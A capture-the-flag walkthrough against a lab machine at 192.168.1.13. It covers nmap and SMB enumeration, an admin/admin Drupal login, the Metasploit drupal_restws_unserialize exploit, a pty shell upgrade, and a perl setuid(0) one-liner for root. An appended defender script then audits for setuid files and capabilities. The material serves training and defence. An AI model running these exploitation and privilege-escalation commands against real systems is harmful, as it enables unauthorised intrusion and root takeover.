Using nmap -A -T4 -p- 192.168.1.13 -vv

Running dirb:

As we can see in the nmap scan, ports 139 and 445 are open, so let's exploit them:

Let's connect to the SMB service using smbclient \\\\192.168.1.13\\naruto:

Now we download the text file using: get uzumaki.txt

Well, with some luck I tried different names as the path, and the one that worked out is gara, and I can log in as admin with the password also admin.

Now the host is using Drupal 8 as we can see:

Searching searchsploit for Drupal 8 came up with:

So now we are going to use Metasploit and search for drupal unserialize: use exploit/unix/webapp/drupal_restws_unserialize


And we have a shell, let's break out of it with python3 -c 'import pty;pty.spawn("/bin/bash")'

Changed directory to home and found two users, narato and yashika. The user yashika has a file perl, which we can use to escalate our privileges to root.

We can simply type ./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
Then, if you run id, you can see you are root. Navigate to the root directory, read the final.txt file, and you are done.
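
The last step only works because that perl copy is allowed to call setuid(0), which means it is setuid-root or holds the cap_setuid file capability (the write-up does not say which, so that is an assumption). A defender-side audit for exactly that condition, as an added example that is not part of the original write-up; the function names are hypothetical:

```shell
#!/bin/sh
# Added example (not from the write-up): list files that can hand out root the
# way the perl copy in yashika's home does. Function names are hypothetical.

# Interpreters and shells that should never be setuid or hold cap_setuid.
INTERPRETERS='perl[0-9.]*|python[0-9.]*|ruby[0-9.]*|php[0-9.]*|node|lua[0-9.]*|bash|dash|zsh|sh'

# Print setuid/setgid regular files under the given directories.
find_suid() {
    # Unreadable directories make find exit non-zero; that is expected here.
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null || true
}

# Read `getcap -r` output on stdin; print paths holding cap_setuid/cap_setgid.
# Accepts both "path = caps" (older libcap) and "path caps" (newer) layouts.
caps_setuid() {
    grep -E 'cap_set[ug]id' | sed -E 's/ (= )?cap_.*$//'
}

# HIGH: interpreter/shell by name, or located where users can write. Else REVIEW.
classify() {
    base=$(basename "$1")
    if printf '%s\n' "$base" | grep -Eq "^($INTERPRETERS)\$"; then
        echo "HIGH $1 (interpreter with elevated privileges)"
        return
    fi
    case "$1" in
        /home/*|/tmp/*|/var/tmp/*|/dev/shm/*)
            echo "HIGH $1 (user-writable location)" ;;
        *)  echo "REVIEW $1" ;;
    esac
}

# Audit the given directories: setuid/setgid bits plus file capabilities.
audit() {
    {
        find_suid "$@"
        if command -v getcap >/dev/null 2>&1; then
            getcap -r "$@" 2>/dev/null | caps_setuid
        fi
    } | sort -u | while IFS= read -r path; do
        classify "$path"
    done
}

# Example: sh audit.sh / /home
if [ "$#" -gt 0 ]; then audit "$@"; fi
```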
